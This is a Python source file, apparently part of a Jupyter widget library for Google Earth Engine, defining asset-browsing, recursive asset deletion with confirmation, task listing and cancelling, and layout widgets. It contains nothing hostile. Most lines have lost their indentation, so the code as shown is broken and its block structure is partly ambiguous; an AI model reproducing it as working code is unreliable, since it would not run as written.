        acc.selected_index = None  # this will unselect all
return VBox([header, acc])
elif ty == 'FeatureCollection':
try:
info = object.getInfo()
except:
print('FeatureCollection limited to 4000 features')
            info = object.limit(4000).getInfo()
return create_accordion(info)
else:
info = object.getInfo()
return create_accordion(info)
def create_async_output(object, widget):
try:
child = create_object_output(object)
except Exception as e:
child = HTML('There has been an error: {}'.format(str(e)))
widget.children = [child]
# def recrusive_delete_asset_to_widget(assetId, widget):
def recrusive_delete_asset_to_widget(args):
''' adapted version to print streaming results in a widget '''
assetId = args[0]
widget = args[1]
try:
content = ee.data.getList({'id':assetId})
except Exception as e:
widget.value = str(e)
return
    if not content:
        # delete empty collection and/or folder
ee.data.deleteAsset(assetId)
else:
for asset in content:
path = asset['id']
ty = asset['type']
if ty == 'Image':
ee.data.deleteAsset(path)
widget.value += 'deleting {} ({})</br>'.format(path, ty)
else:
# clear output
widget.value = ''
                recrusive_delete_asset_to_widget((path, widget))
        # delete empty collection and/or folder
ee.data.deleteAsset(assetId)
class CheckRow(HBox):
checkbox = Instance(Checkbox)
widget = Instance(Widget)
def __init__(self, widget, **kwargs):
self.checkbox = Checkbox(indent=False,
layout=Layout(flex='1 1 20', width='auto'))
self.widget = widget
super(CheckRow, self).__init__(children=(self.checkbox, self.widget),
**kwargs)
self.layout = Layout(display='flex', flex_flow='row',
align_content='flex-start')
@observe('widget')
def _ob_wid(self, change):
new = change['new']
self.children = (self.checkbox, new)
def observe_checkbox(self, handler, extra_params={}, **kwargs):
""" set handler for the checkbox widget. Use the property 'widget' of
change to get the corresponding widget
:param handler: callback function
:type handler: function
:param extra_params: extra parameters that can be passed to the handler
:type extra_params: dict
:param kwargs: parameters from traitlets.observe
:type kwargs: dict
"""
# by default only observe value
name = kwargs.get('names', 'value')
def proxy_handler(handler):
def wrap(change):
change['widget'] = self.widget
for key, val in extra_params.items():
change[key] = val
return handler(change)
return wrap
self.checkbox.observe(proxy_handler(handler), names=name, **kwargs)
def observe_widget(self, handler, extra_params={}, **kwargs):
""" set handler for the widget alongside de checkbox
:param handler: callback function
:type handler: function
:param extra_params: extra parameters that can be passed to the handler
:type extra_params: dict
:param kwargs: parameters from traitlets.observe
:type kwargs: dict
"""
def proxy_handler(handler):
def wrap(change):
change['checkbox'] = self.checkbox
for key, val in extra_params.items():
change[key] = val
return handler(change)
return wrap
self.widget.observe(proxy_handler(handler), **kwargs)
class CheckAccordion(VBox):
widgets = Tuple()
def __init__(self, widgets, **kwargs):
# self.widgets = widgets
super(CheckAccordion, self).__init__(**kwargs)
self.widgets = widgets
@observe('widgets')
def _on_child(self, change):
new = change['new'] # list of any widget
newwidgets = []
for widget in new:
            # construct the widget
acc = Accordion(children=(widget,))
acc.selected_index = None # this will unselect all
# create a CheckRow
checkrow = CheckRow(acc)
newwidgets.append(checkrow)
newchildren = tuple(newwidgets)
self.children = newchildren
def set_title(self, index, title):
''' set the title of the widget at indicated index'''
checkrow = self.children[index]
acc = checkrow.widget
acc.set_title(0, title)
def get_title(self, index):
''' get the title of the widget at indicated index'''
checkrow = self.children[index]
acc = checkrow.widget
return acc.get_title(0)
def get_check(self, index):
''' get the state of checkbox in index '''
checkrow = self.children[index]
return checkrow.checkbox.value
def set_check(self, index, state):
''' set the state of checkbox in index '''
checkrow = self.children[index]
checkrow.checkbox.value = state
def checked_rows(self):
''' return a list of indexes of checked rows '''
checked = []
for i, checkrow in enumerate(self.children):
state = checkrow.checkbox.value
if state: checked.append(i)
return checked
def get_widget(self, index):
''' get the widget in index '''
checkrow = self.children[index]
return checkrow.widget
def set_widget(self, index, widget):
''' set the widget for index '''
checkrow = self.children[index]
checkrow.widget.children = (widget,) # Accordion has 1 child
def set_row(self, index, title, widget):
''' set values for the row '''
self.set_title(index, title)
self.set_widget(index, widget)
def set_accordion_handler(self, index, handler, **kwargs):
''' set the handler for Accordion in index '''
checkrow = self.children[index]
checkrow.observe_widget(handler, names=['selected_index'], **kwargs)
def set_checkbox_handler(self, index, handler, **kwargs):
''' set the handler for CheckBox in index '''
checkrow = self.children[index]
checkrow.observe_checkbox(handler, **kwargs)
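
# --- Hedged usage sketch (illustrative only) ---
# A CheckAccordion pairs each widget with a checkbox; AssetManager below uses
# it for asset rows. Titles and contents here are made up.
def _example_check_accordion():
    acc = CheckAccordion(widgets=(HTML('first row'), HTML('second row')))
    acc.set_title(0, 'First')
    acc.set_title(1, 'Second')
    acc.set_check(1, True)            # programmatically tick the second row
    return acc, acc.checked_rows()    # expected: (acc, [1])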
class AssetManager(VBox):
""" Asset Manager Widget """
POOL_SIZE = 5
def __init__(self, map=None, **kwargs):
super(AssetManager, self).__init__(**kwargs)
# Thumb height
self.thumb_height = kwargs.get('thumb_height', 300)
self.root_path = ee.data.getAssetRoots()[0]['id']
# Map
self.map = map
# Header
self.reload_button = Button(description='Reload')
self.add2map = Button(description='Add to Map')
self.delete = Button(description='Delete Selected')
header_children = [self.reload_button, self.delete]
# Add2map only if a Map has been passed
if self.map:
header_children.append(self.add2map)
self.header = HBox(header_children)
# Reload handler
def reload_handler(button):
new_accordion = self.core(self.root_path)
# Set VBox children
self.children = [self.header, new_accordion]
# add2map handler
def add2map_handler(themap):
def wrap(button):
selected_rows = self.get_selected()
for asset, ty in selected_rows.items():
if ty == 'Image':
im = ee.Image(asset)
themap.addLayer(im, {}, asset)
elif ty == 'ImageCollection':
col = ee.ImageCollection(asset)
themap.addLayer(col)
return wrap
# Set reload handler
# self.reload_button.on_click(reload_handler)
self.reload_button.on_click(self.reload)
# Set reload handler
self.add2map.on_click(add2map_handler(self.map))
# Set delete selected handler
self.delete.on_click(self.delete_selected)
# First Accordion
self.root_acc = self.core(self.root_path)
# Set VBox children
self.children = [self.header, self.root_acc]
def delete_selected(self, button=None):
''' function to delete selected assets '''
selected = self.get_selected()
# Output widget
output = HTML('')
def handle_yes(button):
self.children = [self.header, output]
# pool = pp.ProcessPool(self.POOL_SIZE)
if selected:
assets = [ass for ass in selected.keys()]
''' OLD
for asset, ty in selected.items():
recrusive_delete_asset_to_widget(asset, output)
args = []
for asset, ty in selected.items():
args.append((asset, output))
# pool.map(recrusive_delete_asset_to_widget, args)
# pool.map(test2, args)
# pool.close()
# pool.join()
'''
''' Pool way (not good)
pool = Pool(self.POOL_SIZE)
pool.map(batch.recrusive_delete_asset, assets)
# TODO: cant map recrusive_delete_asset_to_widget because the passed widget is not pickable
pool.close()
pool.join()
'''
for assetid in assets:
thread = Thread(target=batch.recrusive_delete_asset,
args=(assetid,))
thread.start()
# when deleting end, reload
self.reload()
def handle_no(button):
self.reload()
def handle_cancel(button):
self.reload()
assets_str = ['{} ({})'.format(ass, ty) for ass, ty in selected.items()]
assets_str = '</br>'.join(assets_str)
confirm = ConfirmationWidget('<h2>Delete {} assets</h2>'.format(len(selected.keys())),
'The following assets are going to be deleted: </br> {} </br> Are you sure?'.format(assets_str),
handle_yes=handle_yes,
handle_no=handle_no,
handle_cancel=handle_cancel)
self.children = [self.header, confirm, output]
def reload(self, button=None):
new_accordion = self.core(self.root_path)
# Set VBox children
self.children = [self.header, new_accordion]
def get_selected(self):
''' get the selected assets
        :return: a dictionary with the asset path as key and its type as value
:rtype: dict
'''
def wrap(checkacc, assets={}, root=self.root_path):
children = checkacc.children # list of CheckRow
for child in children:
checkbox = child.children[0] # checkbox of the CheckRow
widget = child.children[1] # widget of the CheckRow (Accordion)
state = checkbox.value
if isinstance(widget.children[0], CheckAccordion):
title = widget.get_title(0).split(' ')[0]
new_root = '{}/{}'.format(root, title)
newselection = wrap(widget.children[0], assets, new_root)
assets = newselection
else:
if state:
title = child.children[1].get_title(0)
# remove type that is between ()
ass = title.split(' ')[0]
ty = title.split(' ')[1][1:-1]
# append root
ass = '{}/{}'.format(root, ass)
# append title to selected list
# assets.append(title)
assets[ass] = ty
return assets
# get selection on root
begin = self.children[1] # CheckAccordion of root
return wrap(begin)
def core(self, path):
# Get Assets data
root_list = ee.data.getList({'id': path})
# empty lists to fill with ids, types, widgets and paths
ids = []
types = []
widgets = []
paths = []
# iterate over the list of the root
for content in root_list:
# get data
id = content['id']
ty = content['type']
# append data to lists
paths.append(id)
ids.append(id.replace(path+'/', ''))
types.append(ty)
wid = HTML('Loading..')
widgets.append(wid)
# super(AssetManager, self).__init__(widgets=widgets, **kwargs)
# self.widgets = widgets
asset_acc = CheckAccordion(widgets=widgets)
# TODO: set handler for title's checkbox: select all checkboxes (DONE)
# set titles
for i, (title, ty) in enumerate(zip(ids, types)):
final_title = '{title} ({type})'.format(title=title, type=ty)
asset_acc.set_title(i, final_title)
def handle_new_accordion(change):
path = change['path']
index = change['index']
ty = change['type']
if ty == 'Folder' or ty == 'ImageCollection':
wid = self.core(path)
else:
image = ee.Image(path)
try:
info = image.getInfo()
width = int(info['bands'][0]['dimensions'][0])
height = int(info['bands'][0]['dimensions'][1])
new_width = int(self.thumb_height/height*width)
thumb = image.getThumbURL({'dimensions':[new_width,
self.thumb_height]})
# wid = ImageWid(value=thumb)
wid_i = HTML('<img src={}>'.format(thumb))
wid_info = create_accordion(info)
wid = HBox(children=[wid_i, wid_info])
except Exception as e:
message = str(e)
wid = HTML(message)
asset_acc.set_widget(index, wid)
def handle_checkbox(change):
path = change['path']
widget = change['widget'] # Accordion
wid_children = widget.children[0] # can be a HTML or CheckAccordion
new = change['new']
if isinstance(wid_children, CheckAccordion): # set all checkboxes to True
for child in wid_children.children:
check = child.children[0]
check.value = new
# set handlers
for i, (path, ty) in enumerate(zip(paths, types)):
asset_acc.set_accordion_handler(
i, handle_new_accordion,
extra_params={'path':path, 'index':i, 'type': ty}
)
asset_acc.set_checkbox_handler(
i, handle_checkbox,
extra_params={'path':path, 'index':i, 'type': ty}
)
return asset_acc
class TaskManager(VBox):
def __init__(self, **kwargs):
super(TaskManager, self).__init__(**kwargs)
# Header
self.checkbox = Checkbox(indent=False,
layout=Layout(flex='1 1 20', width='auto'))
self.cancel_selected = Button(description='Cancel Selected',
tooltip='Cancel all selected tasks')
        self.cancel_all = Button(description='Cancel All',
tooltip='Cancel all tasks')
self.refresh = Button(description='Refresh',
tooltip='Refresh Tasks List')
self.autorefresh = ToggleButton(description='auto-refresh',
tooltip='click to enable/disable autorefresh')
self.slider = IntSlider(min=1, max=10, step=1, value=5)
self.hbox = HBox([self.checkbox, self.refresh,
self.cancel_selected, self.cancel_all,
self.autorefresh, self.slider])
# Tabs for COMPLETED, FAILED, etc
self.tabs = Tab()
# Tabs index
self.tab_index = {0: 'RUNNING',
1: 'COMPLETED',
2: 'FAILED',
3: 'CANCELED',
4: 'UNKNOWN'}
self.taskVBox = VBox()
self.runningVBox = VBox()
self.completedVBox = VBox()
self.failedVBox = VBox()
self.canceledVBox = VBox()
self.unknownVBox = VBox()
self.tab_widgets_rel = {'RUNNING': self.runningVBox,
'COMPLETED': self.completedVBox,
'FAILED': self.failedVBox,
'CANCELED': self.canceledVBox,
'UNKNOWN': self.unknownVBox}
# Create Tabs
self.tab_widgets = []
for key, val in self.tab_index.items():
widget = self.tab_widgets_rel[val]
self.tab_widgets.append(widget)
self.tabs.children = self.tab_widgets
self.tabs.set_title(key, val)
''' autorefresh
def update_task_list(widget):
# widget is a VBox
tasklist = ee.data.getTaskList()
widlist = []
for task in tasklist:
accordion = create_accordion(task)
if task.has_key('description'):
name = '{} ({})'.format(task['description'], task['state'])
else:
name = '{} ({})'.format(task['output_url'][0].split('/')[-1], task['state'])
mainacc = Accordion(children=(accordion, ))
mainacc.set_title(0, name)
mainacc.selected_index = None
wid = CheckRow(mainacc)
#wid = CheckRow(accordion)
widlist.append(wid)
widget.children = tuple(widlist)
'''
def loop(widget):
while True:
self.update_task_list()(self.refresh)
time.sleep(self.slider.value)
# First widget
self.update_task_list(vbox=self.runningVBox)(self.refresh)
# self.children = (self.hbox, self.taskVBox)
self.children = (self.hbox, self.tabs)
# Set on_click for refresh button
self.refresh.on_click(self.update_task_list(vbox=self.selected_tab()))
''' autorefresh
thread = threading.Thread(target=loop, args=(self.taskVBox,))
thread.start()
'''
# Set on_clicks
self.cancel_all.on_click(self.cancel_all_click)
self.cancel_selected.on_click(self.cancel_selected_click)
# self.autorefresh
def autorefresh_loop(self):
pass
def tab_handler(self, change):
if change['name'] == 'selected_index':
self.update_task_list()(self.refresh)
def selected_tab(self):
''' get the selected tab '''
index = self.tabs.selected_index
tab_name = self.tab_index[index]
return self.tab_widgets_rel[tab_name]
def update_task_list(self, **kwargs):
def wrap(button):
self.selected_tab().children = (HTML('Loading...'),)
try:
tasklist = ee.data.getTaskList()
# empty lists
running_list = []
completed_list = []
failed_list = []
canceled_list = []
unknown_list = []
all_list = {'RUNNING': running_list, 'COMPLETED': completed_list,
'FAILED': failed_list, 'CANCELED': canceled_list,
'UNKNOWN': unknown_list}
for task in tasklist:
state = task['state']
accordion = create_accordion(task)
if task['state'] == 'COMPLETED':
start = int(task['start_timestamp_ms'])
end = int(task['creation_timestamp_ms'])
seconds = float((start-end))/1000
name = '{} ({} sec)'.format(task['output_url'][0].split('/')[-1],
seconds)
else:
name = '{}'.format(task['description'])
# Accordion for CheckRow widget
mainacc = Accordion(children=(accordion, ))
mainacc.set_title(0, name)
mainacc.selected_index = None
# CheckRow
wid = CheckRow(mainacc)
# Append widget to the CORRECT list
all_list[state].append(wid)
# Assign Children
self.runningVBox.children = tuple(running_list)
self.completedVBox.children = tuple(completed_list)
self.failedVBox.children = tuple(failed_list)
self.canceledVBox.children = tuple(canceled_list)
self.unknownVBox.children = tuple(unknown_list)
except Exception as e:
self.selected_tab().children = (HTML(str(e)),)
return wrap
def get_selected(self):
""" Get selected Tasks
:return: a list of the selected indexes
"""
selected = []
children = self.selected_tab().children
for i, child in enumerate(children):
# checkrow = child.children[0] # child is an accordion
state = child.checkbox.value
if state: selected.append(i)
return selected
def get_taskid(self, index):
# Get selected Tab
selected_wid = self.selected_tab() # VBox
# Children of the Tab's VBox
children = selected_wid.children
# Get CheckRow that corresponds to the passed index
checkrow = children[index]
# Get main accordion
mainacc = checkrow.widget
# Get details accordion
selectedacc = mainacc.children[0]
for n, child in enumerate(selectedacc.children):
title = selectedacc.get_title(n)
if title == 'id':
return child.value
def get_selected_taskid(self):
selected = self.get_selected()
selected_wid = self.selected_tab() # VBox
children = selected_wid.children
taskid_list = []
for select in selected:
'''
checkrow = children[select]
mainacc = checkrow.widget
selectedacc = mainacc.children[0]
for n, child in enumerate(selectedacc.children):
title = selectedacc.get_title(n)
if title == 'id':
taskid_list.append(child.value)
'''
taskid = self.get_taskid(select)
taskid_list.append(taskid)
return taskid_list
def cancel_selected_click(self, button):
selected = self.get_selected_taskid()
for taskid in selected:
try:
ee.data.cancelTask(taskid)
except:
continue
self.update_task_list()(self.refresh)
def cancel_all_click(self, button):
selected_wid = self.selected_tab() # VBox
children = selected_wid.children
for n, child in enumerate(children):
taskid = self.get_taskid(n)
try:
ee.data.cancelTask(taskid)
except:
continue
self.update_task_list()(self.refresh)
class ConfirmationWidget(VBox):
def __init__(self, title='Confirmation', legend='Are you sure?',
handle_yes=None, handle_no=None, handle_cancel=None, **kwargs):
super(ConfirmationWidget, self).__init__(**kwargs)
# Title Widget
self.title = title
self.title_widget = HTML(self.title)
# Legend Widget
self.legend = legend
self.legend_widget = HTML(self.legend)
# Buttons
self.yes = Button(description='Yes')
handler_yes = handle_yes if handle_yes else lambda x: x
self.yes.on_click(handler_yes)
self.no = Button(description='No')
handler_no = handle_no if handle_no else lambda x: x
self.no.on_click(handler_no)
self.cancel = Button(description='Cancel')
handler_cancel = handle_cancel if handle_cancel else lambda x: x
self.cancel.on_click(handler_cancel)
self.buttons = HBox([self.yes, self.no, self.cancel])
self.children = [self.title_widget, self.legend_widget, self.buttons]
class RealBox(Box):
""" Real Box Layout
items:
[[widget1, widget2],
[widget3, widget4]]
"""
items = List()
width = Int()
border_inside = Unicode()
border_outside = Unicode()
def __init__(self, **kwargs):
super(RealBox, self).__init__(**kwargs)
self.layout = Layout(display='flex', flex_flow='column',
border=self.border_outside)
def max_row_elements(self):
maxn = 0
for el in self.items:
n = len(el)
if n>maxn:
maxn = n
return maxn
@observe('items')
def _ob_items(self, change):
layout_columns = Layout(display='flex', flex_flow='row')
new = change['new']
children = []
# recompute size
maxn = self.max_row_elements()
width = 100/maxn
for el in new:
for wid in el:
if not wid.layout.width:
if self.width:
wid.layout = Layout(width='{}px'.format(self.width),
border=self.border_inside)
else:
wid.layout = Layout(width='{}%'.format(width),
border=self.border_inside)
hbox = Box(el, layout=layout_columns)
children.append(hbox)
self.children = children
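
# --- Hedged usage sketch (illustrative only) ---
# Assigning `items` on a RealBox triggers _ob_items, which wraps each row in a
# flex Box and splits the row width evenly between its widgets. Borders and
# labels below are made up.
def _example_real_box():
    rb = RealBox(border_outside='1px solid black',
                 border_inside='1px dotted grey')
    rb.items = [[HTML('r1c1'), HTML('r1c2')],
                [HTML('r2c1')]]
    return rb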
class FloatBandWidget(HBox):
min = Float(0)
max = Float(1)
def __init__(self, **kwargs):
super(FloatBandWidget, self).__init__(**kwargs)
self.minWid = FloatText(value=self.min, description='min')
self.maxWid = FloatText(value=self.max, description='max')
self.children = [self.minWid, self.maxWid]
self.observe(self._ob_min, names=['min'])
self.observe(self._ob_max, names=['max'])
def _ob_min(self, change):
new = change['new']
self.minWid.value = new
def _ob_max(self, change):
new = change['new']
self.maxWid.value = new
|